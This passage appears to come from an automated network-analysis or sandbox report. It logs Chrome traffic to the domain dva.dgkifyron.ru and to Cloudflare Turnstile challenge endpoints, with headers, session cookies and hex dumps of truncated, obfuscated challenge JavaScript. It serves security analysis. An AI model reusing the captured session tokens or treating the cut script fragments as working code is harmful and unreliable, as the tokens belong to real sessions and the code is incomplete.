                                                                                        Sec-Fetch-Dest: image
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/i61ws/0x4AAAAAAA0qv3MB2HiD-Mp6/auto/fbE/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:10:34 UTC240INHTTP/1.1 200 OK
                                                                                        Date: Wed, 18 Dec 2024 01:10:33 GMT
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 61
                                                                                        Connection: close
                                                                                        cache-control: max-age=2629800, public
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f3b461e2c6f0f73-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-12-18 01:10:34 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        15192.168.2.1649725172.67.214.934436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:34 UTC1316OUTGET /favicon.ico HTTP/1.1
                                                                                        Host: dva.dgkifyron.ru
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Referer: https://dva.dgkifyron.ru/ncn6/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Cookie: XSRF-TOKEN=eyJpdiI6IlRocEtJRzNGOFVMdGtYTFBVNzNtMHc9PSIsInZhbHVlIjoiR0pOZGxpUFU3NmprVC8rQ0IzbHoyOG11dGlYY2VpL3NWc3pXY1B1SldtczVRRW1NSXRHNlA5WkVEUW95SUFBQ3NuaHpxYnh6QUptRDU2dHJMc0lsT2NVeUdHWlRoeTRscmlzQWpiMGYwd3hKblNCSTlNWHpjRHJGVi9jYWNVWUoiLCJtYWMiOiJkOTRhMzgyNDFlNzc3MTk4MDVkYWRlZjQzNmIxZWZlY2VjNmQ1Mzc2MzBkZDY1NjZiODU5MTFkZTI4MWM4MGJkIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IjRvTi9YUGJaNHhuYjBKbWhKNFRBd2c9PSIsInZhbHVlIjoiR0ppcWZIYk9TUU1XbjY1dGwyUkF1RnJQa1lCUHFjZjlSQkNOU2U2ZFJQaXh4anNTNytxZlBiclJ6RnhRSW5lUVpKS1pBZ2JyWnc5QlpzdWdSb3FKK3EzMHdLaTZ4WEtrWGllcC85d2RjZDZnYko2ZDhuaVJSa3poM1lMMmNLcGQiLCJtYWMiOiI0YWM0NWE4ZWIyNTk1Y2E5MmM3Y2Y2NjZmZTU1MTEwMmZkMmE0MzA5OTJkNTNkYmFjNjVkMWE0YzZjZGEwYmVlIiwidGFnIjoiIn0%3D
                                                                                        2024-12-18 01:10:34 UTC1073INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 18 Dec 2024 01:10:34 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=14400
                                                                                        Age: 2424
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=98Y9vMEODaOr0vyIkJLQCSB%2F%2Fc4eQE%2BgeiJuNcrNJXdrZeHD%2FSGiWJR4bhp72jqXe9EDeOJGNED1VzeSsnvvyPU5LqC9%2F%2FLKxqb8D7hQN4I7Sya2Gc1ycrL9iPVe5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Vary: Accept-Encoding
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1391&min_rtt=1318&rtt_var=428&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2263&delivery_rate=3017910&cwnd=252&unsent_bytes=0&cid=80c5811594f56ed3&ts=21&x=0"
                                                                                        CF-Cache-Status: HIT
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f3b4622ff43c47c-EWR
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1525&min_rtt=1513&rtt_var=591&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1894&delivery_rate=1814791&cwnd=210&unsent_bytes=0&cid=99bb1f43fb202770&ts=9304&x=0"
                                                                                        2024-12-18 01:10:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        16192.168.2.1649735104.18.94.414436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:35 UTC385OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:10:35 UTC240INHTTP/1.1 200 OK
                                                                                        Date: Wed, 18 Dec 2024 01:10:35 GMT
                                                                                        Content-Type: image/png
                                                                                        Content-Length: 61
                                                                                        Connection: close
                                                                                        cache-control: max-age=2629800, public
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f3b46289e767279-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-12-18 01:10:35 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                        Data Ascii: PNGIHDRsIDAT$IENDB`


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        17192.168.2.1649736104.18.94.414436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:35 UTC433OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f3b461238074211&lang=auto HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:10:36 UTC331INHTTP/1.1 200 OK
                                                                                        Date: Wed, 18 Dec 2024 01:10:36 GMT
                                                                                        Content-Type: application/javascript; charset=UTF-8
                                                                                        Content-Length: 121810
                                                                                        Connection: close
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f3b462b7eea4243-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2024-12-18 01:10:36 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 53 79 57 4f 55 33 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                                                        Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.SyWOU3={"metadata":{"challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"http
                                                                                        2024-12-18 01:10:36 UTC1369INData Raw: 25 32 30 65 78 70 65 63 74 65 64 2e 25 32 30 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 69 6d 65 5f 63 68 65 63 6b 5f 63 61 63 68 65 64 5f 77 61 72 6e 69 6e 67 22 3a 22 59 6f 75 72 25 32 30 64 65 76 69 63 65 25 32 30 63 6c 6f 63 6b 25 32 30 69 73 25 32 30 73 65 74 25 32 30 74 6f 25 32 30 61 25 32 30 77 72 6f 6e 67 25 32 30 74 69 6d 65 25 32 30 6f 72 25 32 30 74 68 69
                                                                                        Data Ascii: %20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20thi
                                                                                        2024-12-18 01:10:36 UTC1369INData Raw: 2c 66 42 2c 66 4c 2c 66 57 2c 67 30 2c 67 61 2c 67 67 2c 67 68 2c 67 48 2c 67 65 2c 67 66 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 30 35 29 29 2f 31 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 30 31 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 32 34 30 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 35 38 34 29 29 2f 34 29 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 35 31 29 29 2f 35 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 37 33 29 29 2f 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 31 31 29 29 2f 37 2b 2d 70 61 72 73 65
                                                                                        Data Ascii: ,fB,fL,fW,g0,ga,gg,gh,gH,ge,gf){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1505))/1*(-parseInt(gI(1001))/2)+-parseInt(gI(240))/3*(-parseInt(gI(584))/4)+parseInt(gI(1451))/5*(-parseInt(gI(1573))/6)+-parseInt(gI(1211))/7+-parse
                                                                                        2024-12-18 01:10:36 UTC1369INData Raw: 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 6b 56 76 74 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 51 72 45 72 47 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 6b 75 73 74 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 5a 63 63 42 63 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 6c 75 79 66 4b 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 64 6e 4f 50 7a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 69 64 75 6f 4a 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c
                                                                                        Data Ascii: ){return h<i},'kVvtu':function(h,i){return i|h},'QrErG':function(h,i){return h<<i},'kustS':function(h,i){return i&h},'ZccBc':function(h,i){return h(i)},'luyfK':function(h,i){return h>i},'dnOPz':function(h,i){return i&h},'iduoJ':function(h,i){return h==i},
                                                                                        2024-12-18 01:10:36 UTC1369INData Raw: 4e 28 31 32 38 39 29 5d 28 27 7c 27 29 2c 50 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 4f 5b 50 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 63 64 2d 2d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 63 6d 3d 64 5b 67 4e 28 35 36 33 29 5d 28 63 6e 2c 63 6f 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 69 66 28 61 53 5b 67 4e 28 31 32 30 31 29 5d 5b 67 4e 28 34 34 31 29 5d 5b 67 4e 28 31 33 38 31 29 5d 28 61 54 2c 61 55 29 29 7b 69 66 28 32 35 36 3e 63 70 5b 67 4e 28 31 33 37 34 29 5d 28 30 29 29 7b 66 6f 72 28 64 73 3d 30 3b 64 5b 67 4e 28 32 38 34 29 5d 28 64 74 2c 64 75 29 3b 64 77 3c 3c 3d 31 2c 64 5b 67 4e 28 31 34 38 36 29 5d 28 64 78 2c 64 79 2d 31 29 3f 28 64 7a 3d 30 2c 64 41 5b 67 4e 28 32 36 32 29 5d 28 64 5b 67 4e 28 35 36
                                                                                        Data Ascii: N(1289)]('|'),P=0;!![];){switch(O[P++]){case'0':cd--;continue;case'1':cm=d[gN(563)](cn,co);continue;case'2':if(aS[gN(1201)][gN(441)][gN(1381)](aT,aU)){if(256>cp[gN(1374)](0)){for(ds=0;d[gN(284)](dt,du);dw<<=1,d[gN(1486)](dx,dy-1)?(dz=0,dA[gN(262)](d[gN(56
                                                                                        2024-12-18 01:10:36 UTC1369INData Raw: 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 43 3d 28 44 2d 2d 2c 44 3d 3d 30 26 26 28 44 3d 4d 61 74 68 5b 67 4e 28 31 32 33 33 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 78 5b 4c 5d 3d 45 2b 2b 2c 64 5b 67 4e 28 35 36 33 29 5d 28 53 74 72 69 6e 67 2c 4b 29 29 7d 69 66 28 27 27 21 3d 3d 43 29 7b 69 66 28 4f 62 6a 65 63 74 5b 67 4e 28 31 32 30 31 29 5d 5b 67 4e 28 34 34 31 29 5d 5b 67 4e 28 31 33 38 31 29 5d 28 42 2c 43 29 29 7b 69 66 28 32 35 36 3e 43 5b 67 4e 28 31 33 37 34 29 5d 28 30 29 29 7b 66 6f 72 28 73 3d 30 3b 73 3c 46 3b 48 3c 3c 3d 31 2c 64 5b 67 4e 28 34 39 36 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 67 4e 28 32 36 32 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 67 4e 28
                                                                                        Data Ascii: ,H=0):I++,M>>=1,s++);C=(D--,D==0&&(D=Math[gN(1233)](2,F),F++),x[L]=E++,d[gN(563)](String,K))}if(''!==C){if(Object[gN(1201)][gN(441)][gN(1381)](B,C)){if(256>C[gN(1374)](0)){for(s=0;s<F;H<<=1,d[gN(496)](I,j-1)?(I=0,G[gN(262)](o(H)),H=0):I++,s++);for(M=C[gN(
                                                                                        2024-12-18 01:10:36 UTC1369INData Raw: 74 63 68 28 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 67 51 28 31 32 33 33 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4c 3d 47 26 48 2c 48 3e 3e 3d 31 2c 64 5b 67 51 28 35 33 36 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 28 64 5b 67 51 28 31 36 37 35 29 5d 28 30 2c 4c 29 3f 31 3a 30 29 2a 46 2c 46 3c 3c 3d 31 29 3b 4d 3d 64 5b 67 51 28 31 33 34 33 29 5d 28 65 2c 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 67 51 28 31 32 33 33 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 46 21 3d 4b 3b 4c 3d 48 26 47 2c 48 3e 3e 3d 31 2c 30 3d 3d 48 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 67 51 28 31 33 32 37 29 5d 28 30 3c 4c
                                                                                        Data Ascii: tch(J){case 0:for(J=0,K=Math[gQ(1233)](2,8),F=1;K!=F;L=G&H,H>>=1,d[gQ(536)](0,H)&&(H=j,G=o(I++)),J|=(d[gQ(1675)](0,L)?1:0)*F,F<<=1);M=d[gQ(1343)](e,J);break;case 1:for(J=0,K=Math[gQ(1233)](2,16),F=1;F!=K;L=H&G,H>>=1,0==H&&(H=j,G=o(I++)),J|=d[gQ(1327)](0<L
                                                                                        2024-12-18 01:10:36 UTC1369INData Raw: 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 28 48 29 7d 2c 27 67 4f 75 52 55 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 3d 3d 3d 48 7d 2c 27 5a 69 41 6c 6b 27 3a 67 55 28 35 32 30 29 2c 27 45 51 7a 66 51 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 29 7d 7d 2c 6e 75 6c 6c 3d 3d 3d 68 7c 7c 6f 5b 67 55 28 31 34 39 34 29 5d 28 76 6f 69 64 20 30 2c 68 29 29 72 65 74 75 72 6e 20 6a 3b 66 6f 72 28 78 3d 6f 5b 67 55 28 34 36 32 29 5d 28 65 54 2c 68 29 2c 67 5b 67 55 28 31 35 33 34 29 5d 5b 67 55 28 33 33 39 29 5d 26 26 28 78 3d 78 5b 67 55 28 35 33 38 29 5d 28 67 5b 67 55 28 31 35 33 34 29 5d 5b 67 55 28 33 33 39 29 5d 28 68 29 29 29 2c 78 3d 67 5b 67 55 28 31 36 38 39 29 5d 5b 67 55
                                                                                        Data Ascii: on(G,H){return G(H)},'gOuRU':function(G,H){return G===H},'ZiAlk':gU(520),'EQzfQ':function(G,H,I){return G(H,I)}},null===h||o[gU(1494)](void 0,h))return j;for(x=o[gU(462)](eT,h),g[gU(1534)][gU(339)]&&(x=x[gU(538)](g[gU(1534)][gU(339)](h))),x=g[gU(1689)][gU
                                                                                        2024-12-18 01:10:36 UTC1369INData Raw: 6f 29 7d 7d 2c 6a 3d 4f 62 6a 65 63 74 5b 67 58 28 38 38 34 29 5d 28 68 29 2c 6b 3d 30 3b 69 5b 67 58 28 38 37 38 29 5d 28 6b 2c 6a 5b 67 58 28 37 34 33 29 5d 29 3b 6b 2b 2b 29 69 66 28 6c 3d 6a 5b 6b 5d 2c 69 5b 67 58 28 34 34 30 29 5d 28 27 66 27 2c 6c 29 26 26 28 6c 3d 27 4e 27 29 2c 67 5b 6c 5d 29 7b 66 6f 72 28 6d 3d 30 3b 6d 3c 68 5b 6a 5b 6b 5d 5d 5b 67 58 28 37 34 33 29 5d 3b 2d 31 3d 3d 3d 67 5b 6c 5d 5b 67 58 28 31 36 35 33 29 5d 28 68 5b 6a 5b 6b 5d 5d 5b 6d 5d 29 26 26 28 69 5b 67 58 28 34 31 36 29 5d 28 65 56 2c 68 5b 6a 5b 6b 5d 5d 5b 6d 5d 29 7c 7c 67 5b 6c 5d 5b 67 58 28 32 36 32 29 5d 28 27 6f 2e 27 2b 68 5b 6a 5b 6b 5d 5d 5b 6d 5d 29 29 2c 6d 2b 2b 29 3b 7d 65 6c 73 65 20 67 5b 6c 5d 3d 68 5b 6a 5b 6b 5d 5d 5b 67 58 28 31 36 33 32 29 5d
                                                                                        Data Ascii: o)}},j=Object[gX(884)](h),k=0;i[gX(878)](k,j[gX(743)]);k++)if(l=j[k],i[gX(440)]('f',l)&&(l='N'),g[l]){for(m=0;m<h[j[k]][gX(743)];-1===g[l][gX(1653)](h[j[k]][m])&&(i[gX(416)](eV,h[j[k]][m])||g[l][gX(262)]('o.'+h[j[k]][m])),m++);}else g[l]=h[j[k]][gX(1632)]
                                                                                        2024-12-18 01:10:36 UTC1369INData Raw: 2c 31 37 29 5e 62 4d 28 4c 2c 31 39 29 5e 4c 3e 3e 3e 31 30 2e 30 34 2c 4c 3d 69 5b 67 59 28 36 38 36 29 5d 28 62 4e 2c 4c 2c 78 5b 69 5b 67 59 28 31 30 37 37 29 5d 28 43 2c 37 29 5d 29 2c 4d 3d 78 5b 43 2d 31 35 5d 2c 4d 3d 69 5b 67 59 28 38 32 37 29 5d 28 69 5b 67 59 28 31 35 36 33 29 5d 28 62 4f 28 4d 2c 37 29 2c 62 50 28 4d 2c 31 38 29 29 2c 4d 3e 3e 3e 33 29 2c 62 51 28 62 52 28 4c 2c 4d 29 2c 78 5b 43 2d 31 36 5d 29 29 3b 62 4a 3d 28 78 5b 4b 5d 3d 4c 2c 4b 3d 47 2c 4b 3d 62 74 28 4b 2c 36 29 5e 69 5b 67 59 28 36 38 36 29 5d 28 62 75 2c 4b 2c 31 31 29 5e 62 76 28 4b 2c 32 35 29 2c 4b 3d 62 77 28 69 5b 67 59 28 36 38 36 29 5d 28 62 78 2c 62 79 28 62 7a 28 4a 2c 4b 29 2c 69 5b 67 59 28 31 36 30 38 29 5d 28 69 5b 67 59 28 31 31 35 34 29 5d 28 47 2c 48
                                                                                        Data Ascii: ,17)^bM(L,19)^L>>>10.04,L=i[gY(686)](bN,L,x[i[gY(1077)](C,7)]),M=x[C-15],M=i[gY(827)](i[gY(1563)](bO(M,7),bP(M,18)),M>>>3),bQ(bR(L,M),x[C-16]));bJ=(x[K]=L,K=G,K=bt(K,6)^i[gY(686)](bu,K,11)^bv(K,25),K=bw(i[gY(686)](bx,by(bz(J,K),i[gY(1608)](i[gY(1154)](G,H


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        18192.168.2.1649737104.18.95.414436728C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-18 01:10:35 UTC1170OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/125857172:1734480993:OfdE6imy-GzCLV7tV1vzGVc07L0hYO19BOItnccvC5w/8f3b461238074211/ExOb.daxNHAiJT.h1RRGTEKuoCP8liHdCaZ3eIW.bag-1734484232-1.1.1.1-qNIWgYzRApq.Sk3W21WkBZVcC7C5o16q8dSHr6PvGPvTVg8.BgAUf19yvKbZUdM5 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 3194
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        Content-type: application/x-www-form-urlencoded
                                                                                        CF-Chl-RetryAttempt: 0
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        CF-Challenge: ExOb.daxNHAiJT.h1RRGTEKuoCP8liHdCaZ3eIW.bag-1734484232-1.1.1.1-qNIWgYzRApq.Sk3W21WkBZVcC7C5o16q8dSHr6PvGPvTVg8.BgAUf19yvKbZUdM5
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Origin: https://challenges.cloudflare.com
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/i61ws/0x4AAAAAAA0qv3MB2HiD-Mp6/auto/fbE/normal/auto/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-18 01:10:35 UTC3194OUTData Raw: 76 5f 38 66 33 62 34 36 31 32 33 38 30 37 34 32 31 31 3d 4a 56 68 7a 25 32 62 7a 38 7a 6b 7a 4f 7a 4b 7a 36 51 45 64 51 45 79 5a 50 79 50 69 63 67 50 63 45 50 5a 72 69 53 50 6b 72 45 49 51 45 72 53 78 45 4c 37 7a 53 4d 76 79 37 4d 2b 70 56 50 77 45 74 5a 38 53 45 55 38 7a 45 4e 47 45 63 71 39 45 67 35 5a 45 69 68 70 7a 49 37 45 39 7a 38 2b 35 45 4b 51 4d 38 50 45 43 7a 4d 50 43 4d 6a 54 4e 73 50 45 63 39 78 50 66 71 57 63 48 47 2d 73 49 47 4d 50 39 45 47 5a 45 4f 50 45 49 30 41 70 6e 76 4d 50 42 45 2d 36 69 45 31 78 68 4e 55 71 42 4e 7a 50 4e 38 63 49 37 68 76 63 37 45 72 79 72 42 70 51 79 74 37 57 79 45 72 68 45 32 7a 7a 45 6e 7a 51 5a 54 63 49 4f 45 68 68 45 42 65 2b 6d 4e 49 51 42 57 45 65 31 79 42 7a 45 78 31 56 45 75 7a 63 43 41 76 38 4e 36 55 76 5a
                                                                                        Data Ascii: v_8f3b461238074211=JVhz%2bz8zkzOzKz6QEdQEyZPyPicgPcEPZriSPkrEIQErSxEL7zSMvy7M+pVPwEtZ8SEU8zENGEcq9Eg5ZEihpzI7E9z8+5EKQM8PECzMPCMjTNsPEc9xPfqWcHG-sIGMP9EGZEOPEI0ApnvMPBE-6iE1xhNUqBNzPN8cI7hvc7EryrBpQyt7WyErhE2zzEnzQZTcIOEhhEBe+mNIQBWEe1yBzEx1VEuzcCAv8N6UvZ
                                                                                        2024-12-18 01:10:36 UTC767INHTTP/1.1 200 OK
                                                                                        Date: Wed, 18 Dec 2024 01:10:36 GMT
                                                                                        Content-Type: text/plain; charset=UTF-8
                                                                                        Content-Length: 159984
                                                                                        Connection: close
                                                                                        cf-chl-gen: nRbBVXdVex7VV89iyIO5BWsvMiInH0vluIV3fEFlbYWPZi/i9ja3fRD9ASUPGmMCjyhfPabSHJDJcqxsF6ftNkh+pbCON3TVhUVhFQMGRVUHtm7hkZx4jOb8HH/1iTDFDL32WoY++/+g8ypVuVCb8Q5ypQN0/xNtQR1mEXzIfIyIQEY7DiM9gHR3agiZ8knf5BWq+33miJiplENZDmh3UqNeh5WWOncMHkhVpLZuefLsFVy5MGuVTgE3nN+4Z2J3XoKGD0QwLAnoiB5XRzXZXMmoGBZZL97+OqE3nuGeY9rlsbZ5kb6UmChil3a6ITN22jXirIAEs/VYgiqN3V7hK613PyyWssihjc+8fgB/FJp5qfytdiBOKTgyBtI6EtKWtY8UoITpfFdaWzgSzZgerwH35QuQgW9r8/5PuP+loaBJs9TwYbU2jzjW296iUn8X1P04ropIwASHfIj+AwQ7p6UacMpElFL/IqDMogKudvJEdDGcK2Z5S+2Qp+LMRIlMFw==$Ln1PDVilS0Rkav+P
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8f3b462b6d8fef9d-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
